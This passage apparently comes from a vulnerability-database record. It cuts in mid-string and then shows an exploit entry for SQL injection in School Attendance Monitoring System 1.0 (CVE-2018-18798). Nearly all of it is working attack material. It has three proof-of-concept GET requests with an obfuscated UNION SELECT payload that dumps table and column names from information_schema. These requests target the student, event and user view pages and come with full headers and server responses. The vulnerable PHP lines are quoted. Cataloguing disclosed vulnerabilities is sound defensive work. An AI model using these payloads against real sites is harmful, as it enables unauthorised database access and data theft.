\r\n#02 $event = New Event();\r\n#03 $res = $event->single_event($_GET['id']);\r\n#04 \r\n#05 \r\n#06 \r\n#07 ?>\r\nGET /[PATH]/event/index.php?view=view&id=-1%27++uniOn+seLecT+%31%2c(selECt(@x)fROm(selECt(@x:=0x00)%2c(@rUNNing_nuMBer:=0)%2c(@tbl:=0x00)%2c(selECt(0)fROm(infoRMATion_schEMa.coLUMns)wHEre(tABLe_schEMa=daTABase())aNd(0x00)in(@x:=Concat(@x%2cif((@tbl!=tABLe_name)%2cConcat(LPAD(@rUNNing_nuMBer:=@rUNNing_nuMBer%2b1%2c2%2c0x30)%2c0x303d3e%2c@tBl:=tABLe_naMe%2c(@z:=0x00))%2c%200x00)%2clpad(@z:=@z%2b1%2c2%2c0x30)%2c0x3d3e%2c0x4b6f6c6f6e3a20%2ccolumn_name%2c0x3c62723e))))x)%2c%33%2c%34%2c%35%2c%36%2c%37%2d%2d%20%2d HTTP/1.1\r\nHost: TARGET\r\nUser-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0\r\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\nAccept-Language: en-US,en;q=0.5\r\nAccept-Encoding: gzip, deflate\r\nCookie: PHPSESSID=mrht5eahsjgrpgldk6c455ncm3\r\nConnection: keep-alive\r\nHTTP/1.1 200 OK\r\nDate: Sun, 28 Oct 2018 17:12:15 GMT\r\nServer: Apache/2.4.25 (Win32) OpenSSL/1.0.2j PHP/5.6.30\r\nX-Powered-By: PHP/5.6.30\r\nExpires: Thu, 19 Nov 1981 08:52:00 GMT\r\nCache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0\r\nPragma: no-cache\r\nKeep-Alive: timeout=5, max=100\r\nConnection: Keep-Alive\r\nTransfer-Encoding: chunked\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n# POC: \r\n# 3)\r\n# http://localhost/[PATH]/user/index.php?view=view&id=[SQL]\r\n# \r\n#[PATH]/user/view.php\r\n#01 <?php \r\n#02 $user = New User();\r\n#03 $res = $user->single_user($_GET['id']);\r\n#04 \r\n#05 \r\n#06 \r\n#07 ?>\r\nGET 
/[PATH]/user/index.php?view=view&id=-1%27++uniOn+seLecT+%31%2c(selECt(@x)fROm(selECt(@x:=0x00)%2c(@rUNNing_nuMBer:=0)%2c(@tbl:=0x00)%2c(selECt(0)fROm(infoRMATion_schEMa.coLUMns)wHEre(tABLe_schEMa=daTABase())aNd(0x00)in(@x:=Concat(@x%2cif((@tbl!=tABLe_name)%2cConcat(LPAD(@rUNNing_nuMBer:=@rUNNing_nuMBer%2b1%2c2%2c0x30)%2c0x303d3e%2c@tBl:=tABLe_naMe%2c(@z:=0x00))%2c%200x00)%2clpad(@z:=@z%2b1%2c2%2c0x30)%2c0x3d3e%2c0x4b6f6c6f6e3a20%2ccolumn_name%2c0x3c62723e))))x)%2c%33%2c%34%2c%35%2c%36%2c%37%2d%2d%20%2d HTTP/1.1\r\nHost: TARGET\r\nUser-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0\r\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\nAccept-Language: en-US,en;q=0.5\r\nAccept-Encoding: gzip, deflate\r\nCookie: PHPSESSID=mrht5eahsjgrpgldk6c455ncm3\r\nConnection: keep-alive\r\nHTTP/1.1 200 OK\r\nDate: Sun, 28 Oct 2018 17:16:52 GMT\r\nServer: Apache/2.4.25 (Win32) OpenSSL/1.0.2j PHP/5.6.30\r\nX-Powered-By: PHP/5.6.30\r\nExpires: Thu, 19 Nov 1981 08:52:00 GMT\r\nCache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0\r\nPragma: no-cache\r\nKeep-Alive: timeout=5, max=100\r\nConnection: Keep-Alive\r\nTransfer-Encoding: chunked\r\nContent-Type: text/html; charset=UTF-8", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://www.exploit-db.com/download/45727"}], "exploitpack": [{"lastseen": "2020-04-01T19:04:47", "description": "\nSchool Attendance Monitoring System 1.0 - SQL Injection", "edition": 1, "published": "2018-10-29T00:00:00", "title": "School Attendance Monitoring System 1.0 - SQL Injection", "type": "exploitpack", "bulletinFamily": "exploit", "cvelist": ["CVE-2018-18798"], "modified": "2018-10-29T00:00:00", "id": "EXPLOITPACK:295868DCF7E82260F77E91018F176617", "href": "", "sourceData": "# Exploit Title: School Attendance Monitoring System 1.0 - SQL Injection\n# Dork: N/A\n# Date: 2018-10-29\n# Exploit Author: Ihsan Sencan\n# Vendor Homepage: 
https://www.sourcecodester.com/users/janobe\n# Software Link: https://www.sourcecodester.com/sites/default/files/download/janobe/attendancemonitoring.zip\n# Version: 1.0\n# Category: Webapps\n# Tested on: WiN7_x64/KaLiLinuX_x64\n# CVE: CVE-2018-18798\n\n# POC: \n# 1)\n# http://localhost/[PATH]/student/index.php?view=view&id=[SQL]\n# \n#[PATH]/student/view.php\n#01 <?php \n#02 $student = New Student();\n#03 $res = $student->select_student($_GET['id']);\n#04 \n#05 \n#06 $course = New Course();\n#07 $resCourse = $course->single_course($res->CourseID);\n#08 \n#09 ?>\nGET /[PATH]/student/index.php?view=view&id=-1%27++uniOn+seLecT+%31%2c(selECt(@x)fROm(selECt(@x:=0x00)%2c(@rUNNing_nuMBer:=0)%2c(@tbl:=0x00)%2c(selECt(0)fROm(infoRMATion_schEMa.coLUMns)wHEre(tABLe_schEMa=daTABase())aNd(0x00)in(@x:=Concat(@x%2cif((@tbl!=tABLe_name)%2cConcat(LPAD(@rUNNing_nuMBer:=@rUNNing_nuMBer%2b1%2c2%2c0x30)%2c0x303d3e%2c@tBl:=tABLe_naMe%2c(@z:=0x00))%2c%200x00)%2clpad(@z:=@z%2b1%2c2%2c0x30)%2c0x3d3e%2c0x4b6f6c6f6e3a20%2ccolumn_name%2c0x3c62723e))))x)%2c%33%2c%34%2c%35%2c%36%2c%37%2c%38%2c%39%2c%31%30%2c%31%31%2c%31%32%2c%31%33%2c%31%34%2d%2d%20%2d HTTP/1.1\nHost: TARGET\nUser-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\nAccept-Language: en-US,en;q=0.5\nAccept-Encoding: gzip, deflate\nCookie: PHPSESSID=mrht5eahsjgrpgldk6c455ncm3\nConnection: keep-alive\nHTTP/1.1 200 OK\nDate: Sun, 28 Oct 2018 19:37:01 GMT\nServer: Apache/2.4.25 (Win32) OpenSSL/1.0.2j PHP/5.6.30\nX-Powered-By: PHP/5.6.30\nExpires: Thu, 19 Nov 1981 08:52:00 GMT\nCache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0\nPragma: no-cache\nKeep-Alive: timeout=5, max=100\nConnection: Keep-Alive\nTransfer-Encoding: chunked\nContent-Type: text/html; charset=UTF-8\n\n# POC: \n# 2)\n# http://localhost/[PATH]/event/index.php?view=view&id=[SQL]\n# \n#[PATH]/event/view.php\n#01 <?php \n#02 $event = New 
Event();\n#03 $res = $event->single_event($_GET['id']);\n#04 \n#05 \n#06 \n#07 ?>\nGET /[PATH]/event/index.php?view=view&id=-1%27++uniOn+seLecT+%31%2c(selECt(@x)fROm(selECt(@x:=0x00)%2c(@rUNNing_nuMBer:=0)%2c(@tbl:=0x00)%2c(selECt(0)fROm(infoRMATion_schEMa.coLUMns)wHEre(tABLe_schEMa=daTABase())aNd(0x00)in(@x:=Concat(@x%2cif((@tbl!=tABLe_name)%2cConcat(LPAD(@rUNNing_nuMBer:=@rUNNing_nuMBer%2b1%2c2%2c0x30)%2c0x303d3e%2c@tBl:=tABLe_naMe%2c(@z:=0x00))%2c%200x00)%2clpad(@z:=@z%2b1%2c2%2c0x30)%2c0x3d3e%2c0x4b6f6c6f6e3a20%2ccolumn_name%2c0x3c62723e))))x)%2c%33%2c%34%2c%35%2c%36%2c%37%2d%2d%20%2d HTTP/1.1\nHost: TARGET\nUser-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\nAccept-Language: en-US,en;q=0.5\nAccept-Encoding: gzip, deflate\nCookie: PHPSESSID=mrht5eahsjgrpgldk6c455ncm3\nConnection: keep-alive\nHTTP/1.1 200 OK\nDate: Sun, 28 Oct 2018 17:12:15 GMT\nServer: Apache/2.4.25 (Win32) OpenSSL/1.0.2j PHP/5.6.30\nX-Powered-By: PHP/5.6.30\nExpires: Thu, 19 Nov 1981 08:52:00 GMT\nCache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0\nPragma: no-cache\nKeep-Alive: timeout=5, max=100\nConnection: Keep-Alive\nTransfer-Encoding: chunked\nContent-Type: text/html; charset=UTF-8\n\n# POC: \n# 3)\n# http://localhost/[PATH]/user/index.php?view=view&id=[SQL]\n# \n#[PATH]/user/view.php\n#01 <?php \n#02 $user = New User();\n#03 $res = $user->single_user($_GET['id']);\n#04 \n#05 \n#06 \n#07 ?>\nGET 
/[PATH]/user/index.php?view=view&id=-1%27++uniOn+seLecT+%31%2c(selECt(@x)fROm(selECt(@x:=0x00)%2c(@rUNNing_nuMBer:=0)%2c(@tbl:=0x00)%2c(selECt(0)fROm(infoRMATion_schEMa.coLUMns)wHEre(tABLe_schEMa=daTABase())aNd(0x00)in(@x:=Concat(@x%2cif((@tbl!=tABLe_name)%2cConcat(LPAD(@rUNNing_nuMBer:=@rUNNing_nuMBer%2b1%2c2%2c0x30)%2c0x303d3e%2c@tBl:=tABLe_naMe%2c(@z:=0x00))%2c%200x00)%2clpad(@z:=@z%2b1%2c2%2c0x30)%2c0x3d3e%2c0x4b6f6c6f6e3a20%2ccolumn_name%2c0x3c62723e))))x)%2c%33%2c%34%2c%35%2c%36%2c%37%2d%2d%20%2d HTTP/1.1\nHost: TARGET\nUser-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\nAccept-Language: en-US,en;q=0.5\nAccept-Encoding: gzip, deflate\nCookie: PHPSESSID=mrht5eahsjgrpgldk6c455ncm3\nConnection: keep-alive\nHTTP/1.1 200 OK\nDate: Sun, 28 Oct 2018 17:16:52 GMT\nServer: Apache/2.4.25 (Win32) OpenSSL/1.0.2j PHP/5.6.30\nX-Powered-By: PHP/5.6.30\nExpires: Thu, 19 Nov 1981 08:52:00 GMT\nCache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0\nPragma: no-cache\nKeep-Alive: timeout=5, max=100\nConnection: Keep-Alive\nTransfer-Encoding: chunked\nContent-Type: text/html; charset=UTF-8", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}]}